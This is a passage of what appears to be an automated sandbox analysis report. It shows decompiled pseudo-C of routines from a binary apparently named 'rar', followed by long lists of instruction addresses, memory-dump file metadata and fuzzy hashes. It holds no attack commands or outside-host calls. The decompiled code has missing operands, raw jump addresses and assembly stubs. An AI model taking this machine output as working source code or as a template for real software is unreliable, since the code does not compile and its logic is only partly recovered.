				E00007FF67FF650B6B168(_t865, _t1035 + 0x68, 0x50b93aa8, _t1029);
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				_push(_t865);
				_push(_t1032);
				_push(_t1029);
				_push(_t1025);
				_push(__r14);
				_t515 = E00007FF67FF650B69CB0(0x10a0, _t858, _t1082, _t1083);
				_t1036 = _t1035 - _t858;
				_t859 =  *0x50b978f0; // 0x27db226282f1
				 *(_t1035 - _t858 + 0x1090) = _t859 ^ _t1035 - _t858;
				E00007FF67FF650B452DC(_t515, _t815,  *((intOrPtr*)(_t1036 + 0x10f0)),  *((intOrPtr*)(_t1036 + 0x10f0)),  *((intOrPtr*)(_t1036 + 0x10f8)), _t1080);
				E00007FF67FF650B31C28(_t1036 + 0x50);
				if (E00007FF67FF650B3298C(_t1036 + 0x50,  *((intOrPtr*)(_t1036 + 0x10f0))) != 0) goto 0x50b315aa;
				_t381 = _t865 + 0x12; // 0x12
				E00007FF67FF650B172F0(_t381, _t1066,  *((intOrPtr*)(_t1036 + 0x10f0)), _t1080);
				_t382 = _t865 + 0x13; // 0x13
				E00007FF67FF650B111C0(_t382, _t1066);
				goto 0x50b315fc;
				_t521 = E00007FF67FF650B17370(_t859 ^ _t1035 - _t858, _t1036 + 0x20);
				E00007FF67FF650B5B008();
				goto 0x50b315d9;
				E00007FF67FF650B329C4(0, 0x100000, _t637, _t859 ^ _t1035 - _t858, _t865, 0x50b93aa8,  *((intOrPtr*)(_t1036 + 0x20)), _t521);
				E00007FF67FF650B5B008();
				if (E00007FF67FF650B32500(0x4580, _t865, _t1036 + 0x50,  *((intOrPtr*)(_t1036 + 0x20)),  *((intOrPtr*)(_t1036 + 0x28)), _t1080) != 0) goto 0x50b315c6;
				E00007FF67FF650B11534(_t1036 + 0x20);
				E00007FF67FF650B31C70(_t1036 + 0x50);
				return E00007FF67FF650B69D10(1, _t382,  *(_t1036 + 0x1090) ^ _t1036);
			}








































































                                                                                                            0x7ff650b30494
                                                                                                            0x7ff650b30494
                                                                                                            0x7ff650b30494
                                                                                                            0x7ff650b30494
                                                                                                            0x7ff650b304a0
                                                                                                            0x7ff650b304a2
                                                                                                            0x7ff650b304a9
                                                                                                            0x7ff650b304b4
                                                                                                            0x7ff650b304c4
                                                                                                            0x7ff650b304cd
                                                                                                            0x7ff650b304d3
                                                                                                            0x7ff650b304d8
                                                                                                            0x7ff650b304df
                                                                                                            0x7ff650b304e7
                                                                                                            0x7ff650b304ee
                                                                                                            0x7ff650b304f3
                                                                                                            0x7ff650b304f8
                                                                                                            0x7ff650b3050a
                                                                                                            0x7ff650b3050d
                                                                                                            0x7ff650b30511
                                                                                                            0x7ff650b3051f
                                                                                                            0x7ff650b30528
                                                                                                            0x7ff650b30535
                                                                                                            0x7ff650b3053e
                                                                                                            0x7ff650b30547
                                                                                                            0x7ff650b3054c
                                                                                                            0x7ff650b3054f
                                                                                                            0x7ff650b3055a
                                                                                                            0x7ff650b3055f
                                                                                                            0x7ff650b30564
                                                                                                            0x7ff650b3056a
                                                                                                            0x7ff650b30574
                                                                                                            0x7ff650b3057b
                                                                                                            0x7ff650b3057d
                                                                                                            0x7ff650b30587
                                                                                                            0x7ff650b3058e
                                                                                                            0x7ff650b3058e
                                                                                                            0x7ff650b30598
                                                                                                            0x7ff650b305a5
                                                                                                            0x7ff650b305b2
                                                                                                            0x7ff650b305b8
                                                                                                            0x7ff650b305bf
                                                                                                            0x7ff650b305cc
                                                                                                            0x7ff650b305d1
                                                                                                            0x7ff650b305dd
                                                                                                            0x7ff650b305ea
                                                                                                            0x7ff650b305fd
                                                                                                            0x7ff650b30609
                                                                                                            0x7ff650b30616
                                                                                                            0x7ff650b3061f
                                                                                                            0x7ff650b30624
                                                                                                            0x7ff650b30627
                                                                                                            0x7ff650b30635
                                                                                                            0x7ff650b30637
                                                                                                            0x7ff650b30642
                                                                                                            0x7ff650b30649
                                                                                                            0x7ff650b30650
                                                                                                            0x7ff650b30652
                                                                                                            0x7ff650b3065f
                                                                                                            0x7ff650b30666
                                                                                                            0x7ff650b3066d
                                                                                                            0x7ff650b3067a
                                                                                                            0x7ff650b30685
                                                                                                            0x7ff650b30694
                                                                                                            0x7ff650b3069a
                                                                                                            0x7ff650b3069e
                                                                                                            0x7ff650b306a1
                                                                                                            0x7ff650b306a4
                                                                                                            0x7ff650b306c5
                                                                                                            0x7ff650b306d1
                                                                                                            0x7ff650b306d6
                                                                                                            0x7ff650b306d8
                                                                                                            0x7ff650b306db
                                                                                                            0x7ff650b306df
                                                                                                            0x7ff650b306ef
                                                                                                            0x7ff650b30700
                                                                                                            0x7ff650b30703
                                                                                                            0x7ff650b30705
                                                                                                            0x7ff650b3070f
                                                                                                            0x7ff650b30716
                                                                                                            0x7ff650b3072e
                                                                                                            0x7ff650b30738
                                                                                                            0x7ff650b30742
                                                                                                            0x7ff650b30745
                                                                                                            0x7ff650b30750
                                                                                                            0x7ff650b30755
                                                                                                            0x7ff650b3075d
                                                                                                            0x7ff650b30765
                                                                                                            0x7ff650b3076a
                                                                                                            0x7ff650b3076c
                                                                                                            0x7ff650b3078d
                                                                                                            0x7ff650b30792
                                                                                                            0x7ff650b30797
                                                                                                            0x7ff650b3079a
                                                                                                            0x7ff650b3079e
                                                                                                            0x7ff650b307ab
                                                                                                            0x7ff650b307b7
                                                                                                            0x7ff650b307bf
                                                                                                            0x7ff650b307c5
                                                                                                            0x7ff650b307c8
                                                                                                            0x7ff650b307cc
                                                                                                            0x7ff650b307d1
                                                                                                            0x7ff650b307d3
                                                                                                            0x7ff650b307da
                                                                                                            0x7ff650b307e2
                                                                                                            0x7ff650b307e8
                                                                                                            0x7ff650b307f7
                                                                                                            0x7ff650b307fd
                                                                                                            0x7ff650b30800
                                                                                                            0x7ff650b30802
                                                                                                            0x7ff650b30818
                                                                                                            0x7ff650b3081e
                                                                                                            0x7ff650b30825
                                                                                                            0x7ff650b30838
                                                                                                            0x7ff650b3083e
                                                                                                            0x7ff650b30849
                                                                                                            0x7ff650b30850
                                                                                                            0x7ff650b30858
                                                                                                            0x7ff650b3085b
                                                                                                            0x7ff650b3085d
                                                                                                            0x7ff650b30860
                                                                                                            0x7ff650b30864
                                                                                                            0x7ff650b3086d
                                                                                                            0x7ff650b3086d
                                                                                                            0x7ff650b30877
                                                                                                            0x7ff650b3087f
                                                                                                            0x7ff650b30885
                                                                                                            0x7ff650b3088b
                                                                                                            0x7ff650b3088d
                                                                                                            0x7ff650b30894
                                                                                                            0x7ff650b3089b
                                                                                                            0x7ff650b308a2
                                                                                                            0x7ff650b308b5
                                                                                                            0x7ff650b308b7
                                                                                                            0x7ff650b308be
                                                                                                            0x7ff650b308c5
                                                                                                            0x7ff650b308c7
                                                                                                            0x7ff650b308cf
                                                                                                            0x7ff650b308d1
                                                                                                            0x7ff650b308d8
                                                                                                            0x7ff650b308da
                                                                                                            0x7ff650b308dd
                                                                                                            0x7ff650b308e1
                                                                                                            0x7ff650b308fb
                                                                                                            0x7ff650b30909
                                                                                                            0x7ff650b30911
                                                                                                            0x7ff650b3091f
                                                                                                            0x7ff650b30934
                                                                                                            0x7ff650b30937
                                                                                                            0x7ff650b3093b
                                                                                                            0x7ff650b30943
                                                                                                            0x7ff650b30957
                                                                                                            0x7ff650b30959
                                                                                                            0x7ff650b30972
                                                                                                            0x7ff650b30975
                                                                                                            0x7ff650b30978
                                                                                                            0x7ff650b3097c
                                                                                                            0x7ff650b30980
                                                                                                            0x7ff650b30984
                                                                                                            0x7ff650b30988
                                                                                                            0x7ff650b3098c
                                                                                                            0x7ff650b30990
                                                                                                            0x7ff650b30994
                                                                                                            0x7ff650b30998
                                                                                                            0x7ff650b3099c
                                                                                                            0x7ff650b309a0
                                                                                                            0x7ff650b309a4
                                                                                                            0x7ff650b309af
                                                                                                            0x7ff650b309b3
                                                                                                            0x7ff650b309c2
                                                                                                            0x7ff650b309c7
                                                                                                            0x7ff650b309ce
                                                                                                            0x7ff650b309d4
                                                                                                            0x7ff650b309e0
                                                                                                            0x7ff650b309fa
                                                                                                            0x7ff650b30a07
                                                                                                            0x7ff650b30a0c
                                                                                                            0x7ff650b30a17
                                                                                                            0x7ff650b30a1b
                                                                                                            0x7ff650b30a20
                                                                                                            0x7ff650b30a25
                                                                                                            0x7ff650b30a29
                                                                                                            0x7ff650b30a35
                                                                                                            0x7ff650b30a40
                                                                                                            0x7ff650b30a4c
                                                                                                            0x7ff650b30a60
                                                                                                            0x7ff650b30a62
                                                                                                            0x7ff650b30a63
                                                                                                            0x7ff650b30a65
                                                                                                            0x7ff650b30a67
                                                                                                            0x7ff650b30a7c
                                                                                                            0x7ff650b30a83
                                                                                                            0x7ff650b30a93
                                                                                                            0x7ff650b30a9d
                                                                                                            0x7ff650b30aa2
                                                                                                            0x7ff650b30aa7
                                                                                                            0x7ff650b30aae
                                                                                                            0x7ff650b30ac9
                                                                                                            0x7ff650b30ace
                                                                                                            0x7ff650b30ad1
                                                                                                            0x7ff650b30ad9
                                                                                                            0x7ff650b30ae5
                                                                                                            0x7ff650b30aeb
                                                                                                            0x7ff650b30af1
                                                                                                            0x7ff650b30afc
                                                                                                            0x7ff650b30b05
                                                                                                            0x7ff650b30b0e
                                                                                                            0x7ff650b30b18
                                                                                                            0x7ff650b30b2f
                                                                                                            0x7ff650b30b35
                                                                                                            0x7ff650b30b43
                                                                                                            0x7ff650b30b49
                                                                                                            0x7ff650b30b52
                                                                                                            0x7ff650b30b56
                                                                                                            0x7ff650b30b62
                                                                                                            0x7ff650b30b6c
                                                                                                            0x7ff650b30b71
                                                                                                            0x7ff650b30b80
                                                                                                            0x7ff650b30b89
                                                                                                            0x7ff650b30b8f
                                                                                                            0x7ff650b30b92
                                                                                                            0x7ff650b30ba1
                                                                                                            0x7ff650b30ba6
                                                                                                            0x7ff650b30ba8
                                                                                                            0x7ff650b30bb2
                                                                                                            0x7ff650b30bb6
                                                                                                            0x7ff650b30bbd
                                                                                                            0x7ff650b30bc1
                                                                                                            0x7ff650b30bc3
                                                                                                            0x7ff650b30bce
                                                                                                            0x7ff650b30bd0
                                                                                                            0x7ff650b30be4
                                                                                                            0x7ff650b30bf1
                                                                                                            0x7ff650b30bf9
                                                                                                            0x7ff650b30c01
                                                                                                            0x7ff650b30c15
                                                                                                            0x7ff650b30c18
                                                                                                            0x7ff650b30c1f
                                                                                                            0x7ff650b30c27
                                                                                                            0x7ff650b30c2c
                                                                                                            0x7ff650b30c30
                                                                                                            0x7ff650b30c35
                                                                                                            0x7ff650b30c38
                                                                                                            0x7ff650b30c4d
                                                                                                            0x7ff650b30c53
                                                                                                            0x7ff650b30c56
                                                                                                            0x7ff650b30c5b
                                                                                                            0x7ff650b30c61
                                                                                                            0x7ff650b30c6c
                                                                                                            0x7ff650b30c78
                                                                                                            0x7ff650b30c7a
                                                                                                            0x7ff650b30c87
                                                                                                            0x7ff650b30c8f
                                                                                                            0x7ff650b30c91
                                                                                                            0x7ff650b30c94
                                                                                                            0x7ff650b30ca9
                                                                                                            0x7ff650b30cb4
                                                                                                            0x7ff650b30cb8
                                                                                                            0x7ff650b30cc3
                                                                                                            0x7ff650b30cd3
                                                                                                            0x7ff650b30ce1
                                                                                                            0x7ff650b30ce9
                                                                                                            0x7ff650b30cf4
                                                                                                            0x7ff650b30cfd
                                                                                                            0x7ff650b30d04
                                                                                                            0x7ff650b30d11
                                                                                                            0x7ff650b30d1d
                                                                                                            0x7ff650b30d21
                                                                                                            0x7ff650b30d28
                                                                                                            0x7ff650b30d34
                                                                                                            0x7ff650b30d47
                                                                                                            0x7ff650b30d4f
                                                                                                            0x7ff650b30d54
                                                                                                            0x7ff650b30d5c
                                                                                                            0x7ff650b30d67
                                                                                                            0x7ff650b30d6e
                                                                                                            0x7ff650b30d79
                                                                                                            0x7ff650b30d7e
                                                                                                            0x7ff650b30d88
                                                                                                            0x7ff650b30d90
                                                                                                            0x7ff650b30d99
                                                                                                            0x7ff650b30da8
                                                                                                            0x7ff650b30daa
                                                                                                            0x7ff650b30daf
                                                                                                            0x7ff650b30db6
                                                                                                            0x7ff650b30dbd
                                                                                                            0x7ff650b30dc4
                                                                                                            0x7ff650b30dcf
                                                                                                            0x7ff650b30ddb
                                                                                                            0x7ff650b30deb
                                                                                                            0x7ff650b30df4
                                                                                                            0x7ff650b30df9
                                                                                                            0x7ff650b30e00
                                                                                                            0x7ff650b30e07
                                                                                                            0x7ff650b30e15
                                                                                                            0x7ff650b30e1b
                                                                                                            0x7ff650b30e20
                                                                                                            0x7ff650b30e25
                                                                                                            0x7ff650b30e30
                                                                                                            0x7ff650b30e3c
                                                                                                            0x7ff650b30e48
                                                                                                            0x7ff650b30e56
                                                                                                            0x7ff650b30e5f
                                                                                                            0x7ff650b30e68
                                                                                                            0x7ff650b30e75
                                                                                                            0x7ff650b30e7a
                                                                                                            0x7ff650b30e88
                                                                                                            0x7ff650b30e91
                                                                                                            0x7ff650b30e98
                                                                                                            0x7ff650b30e9f
                                                                                                            0x7ff650b30ea6
                                                                                                            0x7ff650b30eae
                                                                                                            0x7ff650b30eb9
                                                                                                            0x7ff650b30ec3
                                                                                                            0x7ff650b30ec5
                                                                                                            0x7ff650b30ecf
                                                                                                            0x7ff650b30ed7
                                                                                                            0x7ff650b30ed9
                                                                                                            0x7ff650b30ee7
                                                                                                            0x7ff650b30ef0
                                                                                                            0x7ff650b30ef7
                                                                                                            0x7ff650b30efd
                                                                                                            0x7ff650b30f06
                                                                                                            0x7ff650b30f0b
                                                                                                            0x7ff650b30f17
                                                                                                            0x7ff650b30f27
                                                                                                            0x7ff650b30f2c
                                                                                                            0x7ff650b30f33
                                                                                                            0x7ff650b30f40
                                                                                                            0x7ff650b30f46
                                                                                                            0x7ff650b30f61
                                                                                                            0x7ff650b30f69
                                                                                                            0x7ff650b30f7a
                                                                                                            0x7ff650b30f84
                                                                                                            0x7ff650b30f8a
                                                                                                            0x7ff650b30f93
                                                                                                            0x7ff650b30f96
                                                                                                            0x7ff650b30f98
                                                                                                            0x7ff650b30f9b
                                                                                                            0x7ff650b30f9e
                                                                                                            0x7ff650b30fa5
                                                                                                            0x7ff650b30fab
                                                                                                            0x7ff650b30fb7
                                                                                                            0x7ff650b30fbf
                                                                                                            0x7ff650b30fd1
                                                                                                            0x7ff650b30fd8
                                                                                                            0x7ff650b30fdb
                                                                                                            0x7ff650b30fe0
                                                                                                            0x7ff650b30fe3
                                                                                                            0x7ff650b30ff0
                                                                                                            0x7ff650b30ff7
                                                                                                            0x7ff650b30ffb
                                                                                                            0x7ff650b30ffd
                                                                                                            0x7ff650b31005
                                                                                                            0x7ff650b31018
                                                                                                            0x7ff650b31022
                                                                                                            0x7ff650b31028
                                                                                                            0x7ff650b3102d
                                                                                                            0x7ff650b3102f
                                                                                                            0x7ff650b31044
                                                                                                            0x7ff650b31049
                                                                                                            0x7ff650b3104b
                                                                                                            0x7ff650b31058
                                                                                                            0x7ff650b3105d
                                                                                                            0x7ff650b31072
                                                                                                            0x7ff650b31077
                                                                                                            0x7ff650b3107e
                                                                                                            0x7ff650b31087
                                                                                                            0x7ff650b3108c
                                                                                                            0x7ff650b3108e
                                                                                                            0x7ff650b31094
                                                                                                            0x7ff650b3109c
                                                                                                            0x7ff650b310a0
                                                                                                            0x7ff650b310ae
                                                                                                            0x7ff650b310b9
                                                                                                            0x7ff650b310c5
                                                                                                            0x7ff650b310ce
                                                                                                            0x7ff650b310d2
                                                                                                            0x7ff650b310d7
                                                                                                            0x7ff650b310e2
                                                                                                            0x7ff650b310ef
                                                                                                            0x7ff650b310f5
                                                                                                            0x7ff650b3110a
                                                                                                            0x7ff650b3110f
                                                                                                            0x7ff650b31116
                                                                                                            0x7ff650b3111d
                                                                                                            0x7ff650b31126
                                                                                                            0x7ff650b31133
                                                                                                            0x7ff650b3113e
                                                                                                            0x7ff650b31147
                                                                                                            0x7ff650b3114f
                                                                                                            0x7ff650b31152
                                                                                                            0x7ff650b31154
                                                                                                            0x7ff650b31157
                                                                                                            0x7ff650b31159
                                                                                                            0x7ff650b3116d
                                                                                                            0x7ff650b31175
                                                                                                            0x7ff650b31182
                                                                                                            0x7ff650b3118c
                                                                                                            0x7ff650b31199
                                                                                                            0x7ff650b311af
                                                                                                            0x7ff650b311b9
                                                                                                            0x7ff650b311bb
                                                                                                            0x7ff650b311c2
                                                                                                            0x7ff650b311ca
                                                                                                            0x7ff650b311d3
                                                                                                            0x7ff650b311d7
                                                                                                            0x7ff650b311d9
                                                                                                            0x7ff650b311e6
                                                                                                            0x7ff650b311ef
                                                                                                            0x7ff650b311f7
                                                                                                            0x7ff650b311f9
                                                                                                            0x7ff650b31206
                                                                                                            0x7ff650b31210
                                                                                                            0x7ff650b31220
                                                                                                            0x7ff650b3122c
                                                                                                            0x7ff650b3122e
                                                                                                            0x7ff650b31235
                                                                                                            0x7ff650b3123c
                                                                                                            0x7ff650b31253
                                                                                                            0x7ff650b3125d
                                                                                                            0x7ff650b31264
                                                                                                            0x7ff650b3126b
                                                                                                            0x7ff650b31272
                                                                                                            0x7ff650b3127a
                                                                                                            0x7ff650b3127c
                                                                                                            0x7ff650b3127e
                                                                                                            0x7ff650b31287
                                                                                                            0x7ff650b31289
                                                                                                            0x7ff650b31298
                                                                                                            0x7ff650b312ad
                                                                                                            0x7ff650b312b2
                                                                                                            0x7ff650b312c1
                                                                                                            0x7ff650b312cd
                                                                                                            0x7ff650b312d6
                                                                                                            0x7ff650b312e0
                                                                                                            0x7ff650b312e2
                                                                                                            0x7ff650b312e7
                                                                                                            0x7ff650b312eb
                                                                                                            0x7ff650b312f1
                                                                                                            0x7ff650b312fa
                                                                                                            0x7ff650b31302
                                                                                                            0x7ff650b3130a
                                                                                                            0x7ff650b31310
                                                                                                            0x7ff650b3131a
                                                                                                            0x7ff650b3131c
                                                                                                            0x7ff650b31326
                                                                                                            0x7ff650b3132e
                                                                                                            0x7ff650b31332
                                                                                                            0x7ff650b3133b
                                                                                                            0x7ff650b31344
                                                                                                            0x7ff650b3134c
                                                                                                            0x7ff650b31358
                                                                                                            0x7ff650b31360
                                                                                                            0x7ff650b31366
                                                                                                            0x7ff650b31370
                                                                                                            0x7ff650b31374
                                                                                                            0x7ff650b3137d
                                                                                                            0x7ff650b31386
                                                                                                            0x7ff650b3138f
                                                                                                            0x7ff650b31396
                                                                                                            0x7ff650b313a5
                                                                                                            0x7ff650b313a8
                                                                                                            0x7ff650b313ba
                                                                                                            0x7ff650b313c8
                                                                                                            0x7ff650b313d5
                                                                                                            0x7ff650b313f7
                                                                                                            0x7ff650b31408
                                                                                                            0x7ff650b31416
                                                                                                            0x7ff650b31423
                                                                                                            0x7ff650b3142a
                                                                                                            0x7ff650b3142c
                                                                                                            0x7ff650b3143d
                                                                                                            0x7ff650b31449
                                                                                                            0x7ff650b31451
                                                                                                            0x7ff650b31458
                                                                                                            0x7ff650b31462
                                                                                                            0x7ff650b31464
                                                                                                            0x7ff650b31468
                                                                                                            0x7ff650b3146a
                                                                                                            0x7ff650b3146d
                                                                                                            0x7ff650b31471
                                                                                                            0x7ff650b31473
                                                                                                            0x7ff650b31475
                                                                                                            0x7ff650b31487
                                                                                                            0x7ff650b31489
                                                                                                            0x7ff650b31494
                                                                                                            0x7ff650b314a0
                                                                                                            0x7ff650b314a5
                                                                                                            0x7ff650b314b3
                                                                                                            0x7ff650b314be
                                                                                                            0x7ff650b314c7
                                                                                                            0x7ff650b314c9
                                                                                                            0x7ff650b314d7
                                                                                                            0x7ff650b314df
                                                                                                            0x7ff650b314eb
                                                                                                            0x7ff650b314f0
                                                                                                            0x7ff650b314f5
                                                                                                            0x7ff650b314fa
                                                                                                            0x7ff650b31500
                                                                                                            0x7ff650b3150a
                                                                                                            0x7ff650b3151b
                                                                                                            0x7ff650b31520
                                                                                                            0x7ff650b31521
                                                                                                            0x7ff650b31522
                                                                                                            0x7ff650b31523
                                                                                                            0x7ff650b31524
                                                                                                            0x7ff650b31526
                                                                                                            0x7ff650b31527
                                                                                                            0x7ff650b31528
                                                                                                            0x7ff650b31529
                                                                                                            0x7ff650b31530
                                                                                                            0x7ff650b31535
                                                                                                            0x7ff650b31538
                                                                                                            0x7ff650b31542
                                                                                                            0x7ff650b31569
                                                                                                            0x7ff650b31573
                                                                                                            0x7ff650b3158a
                                                                                                            0x7ff650b31595
                                                                                                            0x7ff650b31598
                                                                                                            0x7ff650b315a0
                                                                                                            0x7ff650b315a3
                                                                                                            0x7ff650b315a8
                                                                                                            0x7ff650b315b4
                                                                                                            0x7ff650b315ba
                                                                                                            0x7ff650b315c4
                                                                                                            0x7ff650b315cf
                                                                                                            0x7ff650b315d4
                                                                                                            0x7ff650b315ed
                                                                                                            0x7ff650b315f6
                                                                                                            0x7ff650b31601
                                                                                                            0x7ff650b31625

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 3c5a85c3bb7554cd592f3bfa6e555789a55cbbc2955e47582d07d92ae21bc115
                                                                                                            • Instruction ID: 8c1a4712084db764983e5be39cfda706b4b61d07273f2fb05ee6708a3b5a6b2e
                                                                                                            • Opcode Fuzzy Hash: 3c5a85c3bb7554cd592f3bfa6e555789a55cbbc2955e47582d07d92ae21bc115
                                                                                                            • Instruction Fuzzy Hash: 11D1C662A1C6C3A6EF21CB2594A02FE7794EF56748F5D4035CB8EA7786DE2EE504C700
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00007FF650B3A90C Relevance: .3, Instructions: 282COMMONCrypto
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 84%
                                                                                                            			E00007FF67FF650B3A90C(signed int __edx, signed int __rbx, long long __rcx, long long __rdx, long long __r8) {
				void* __rsi;
				void* __rbp;
				void* _t106;
				signed long long _t115;
				signed int _t129;
				void* _t130;
				intOrPtr _t136;
				signed int _t153;
				void* _t157;
				void* _t191;
				signed long long _t209;
				signed long long _t214;
				intOrPtr* _t216;
				void* _t219;
				signed long long _t221;
				signed long long _t223;
				signed long long _t227;
				signed long long _t229;
				signed long long _t232;
				signed long long _t234;
				void* _t245;
				intOrPtr* _t253;
				signed int* _t254;
				void* _t258;
				void* _t260;
				signed long long _t261;
				long long _t264;
				signed int _t267;
				intOrPtr* _t270;
				void* _t271;
				intOrPtr* _t277;
				void* _t281;
				intOrPtr _t282;
				intOrPtr _t285;

				_t222 = __rbx;
				 *((long long*)(_t260 + 8)) = __rbx;
				_push(_t281);
				_t258 = _t260 - 0x400;
				_t261 = _t260 - 0x500;
				_t209 =  *0x50b978f0; // 0x27db226282f1
				 *(_t258 + 0x3f0) = _t209 ^ _t261;
				_t253 =  *((intOrPtr*)(_t258 + 0x460));
				_t277 =  *((intOrPtr*)(_t258 + 0x468));
				 *(_t261 + 0x30) = r9d;
				_t8 = _t222 + 8; // 0x8
				r13d = _t8;
				 *((long long*)(_t261 + 0x48)) = __r8;
				 *((long long*)(_t261 + 0x40)) = __rdx;
				 *((long long*)(_t261 + 0x38)) = __rcx;
				if ( *((intOrPtr*)(__rcx + 0x18)) != 2) goto 0x50b3a97c;
				r13d = 0;
				asm("sbb ebx, ebx");
				_t129 = 0 &  *(__rcx + 0x1c);
				r14d = 0x101;
				asm("cdq");
				r14d =  <  ? r9d + (__edx & 0x000000ff) >> 8 : r14d;
				r8d = 0;
				_t285 = r14d;
				if (_t129 != 0) goto 0x50b3aa1e;
				 *((intOrPtr*)(_t261 + 0x28)) = r14d;
				_t264 = __r8;
				 *(_t261 + 0x20) = _t258 - 0x20;
				_t106 = E00007FF67FF650B3AF38(__edx & 0x000000ff, _t157, __rcx, __rdx, __r8);
				_t227 = _t261 + 0x50;
				r8d = 0x84;
				E00007FF67FF650B6C1A0(_t106, 0, _t227, __rdx, __r8);
				if (r14d <= 0) goto 0x50b3a9e7;
				 *((intOrPtr*)(_t261 + 0x50 +  *(_t258 + _t227 * 4 - 0x20) * 4)) =  *((intOrPtr*)(_t261 + 0x50 +  *(_t258 + _t227 * 4 - 0x20) * 4)) + 1;
				if (_t227 + 1 - _t285 < 0) goto 0x50b3a9d6;
				r8d =  *((intOrPtr*)(_t261 + 0x54));
				_t270 = _t261 + 0x58;
				r9d = 2;
				_t271 = _t270 + 4;
				_t134 =  <=  ? 1 : r9d;
				r8d = r8d +  *_t270;
				r9d = r9d + 1;
				_t152 =  <=  ? 1 : r9d;
				if (r9d - 0x21 < 0) goto 0x50b3a9f7;
				r9d =  *(_t261 + 0x30);
				if (r13d == 8) goto 0x50b3aa48;
				_t34 = _t222 - 1; // -1
				if (_t34 - 0x1e > 0) goto 0x50b3aa48;
				 *(_t253 + 4) =  *(_t253 + 4) & 0x00000000;
				 *(_t253 + 8) = r9d;
				 *_t253 = r13d;
				_t153 =  !=  ? _t129 :  <=  ? 1 : r9d;
				 *(_t253 + 0xc) = _t153;
				 *_t277 =  *_t277 + 1;
				goto 0x50b3ac94;
				_t229 = _t153;
				if (_t229 - 0x21 >= 0) goto 0x50b3aa71;
				_t267 = _t229 * 4;
				_t232 = _t261 + 0x50 + _t267 + _t267;
				if (_t153 + _t153 - 0x21 < 0) goto 0x50b3aa65;
				if (r8d - 0x10 <= 0) goto 0x50b3ab5f;
				if (__rdx + __rdx - r8d <= 0) goto 0x50b3ab5f;
				r8d = 0;
				if (r14d <= 0) goto 0x50b3aaeb;
				r10d =  *(_t258 + _t232 * 4 - 0x20);
				if (r10d - 4 <= 0) goto 0x50b3aae0;
				asm("cdq");
				if (r10d % _t153 != 0) goto 0x50b3aae0;
				r9d = 0;
				_t214 = r8d;
				if (_t214 - _t285 >= 0) goto 0x50b3aadc;
				if ( *((intOrPtr*)(_t258 + _t214 * 4 - 0x20)) != r10d) goto 0x50b3aac8;
				r9d = r9d + 1;
				_t245 = __rdx + 1;
				if (_t214 + 1 - _t285 < 0) goto 0x50b3aab3;
				if (_t245 - 8 < 0) goto 0x50b3aadc;
				r8d = r8d - 1;
				r8d = r8d + r9d;
				_t234 = _t232 - 1 + _t245;
				goto 0x50b3aae0;
				 *(_t258 + _t234 * 4 - 0x20) = _t153;
				r8d = r8d + 1;
				if (_t234 + 1 - _t285 < 0) goto 0x50b3aa91;
				_t130 = _t281 - 0x10;
				if (_t130 <= 0) goto 0x50b3ab5f;
				r9d = 0;
				_t56 = _t245 + 0x10; // 0x10
				r10d = _t56;
				r8d = 0;
				if (_t267 - _t271 >= 0) goto 0x50b3ab4c;
				_t61 = _t264 + 1; // 0x1
				_t115 =  !=  ? r8d : _t61;
				r8d = _t115;
				if (_t267 + 1 - _t271 < 0) goto 0x50b3ab0b;
				if (_t115 == 0x10) goto 0x50b3ab4c;
				if (_t115 - 0xc < 0) goto 0x50b3ab4c;
				_t62 = _t245 + 0x10; // 0x10
				if (0 - _t62 >= 0) goto 0x50b3ab4c;
				asm("movd xmm0, edi");
				asm("pshufd xmm0, xmm0, 0x0");
				asm("movups [ecx], xmm0");
				asm("movups [ecx+0x10], xmm0");
				asm("movups [ecx+0x20], xmm0");
				asm("movups [ecx+0x30], xmm0");
				if (0x10 - _t130 < 0) goto 0x50b3ab00;
				if (_t281 - 2 - 2 <= 0) goto 0x50b3ab8d;
				_t216 = _t258 - 0x1c;
				_t136 =  *((intOrPtr*)(_t216 - 4));
				if (_t136 !=  *_t216) goto 0x50b3ab83;
				_t191 = _t136 -  *((intOrPtr*)(_t216 + 8));
				if (_t191 != 0) goto 0x50b3ab83;
				 *((intOrPtr*)(_t216 + 4)) = _t136;
				if (_t191 != 0) goto 0x50b3ab74;
				_t282 =  *((intOrPtr*)(_t258 + 0x470));
				if (_t216 + 4 - _t282 >= 0) goto 0x50b3ac94;
				_t254 = _t253 + 8;
				goto 0x50b3abb7;
				if ( *((intOrPtr*)(_t258 + __rbx * 4 - 0x20)) != 0) goto 0x50b3abbc;
				_t223 = __rbx + 1;
				if (_t223 - _t285 < 0) goto 0x50b3abab;
				r10d =  *(_t258 + _t223 * 4 - 0x20);
				r11d = 0;
				if (_t223 - _t285 >= 0) goto 0x50b3abf4;
				if ( *(_t258 + _t223 * 4 - 0x20) != r10d) goto 0x50b3abf4;
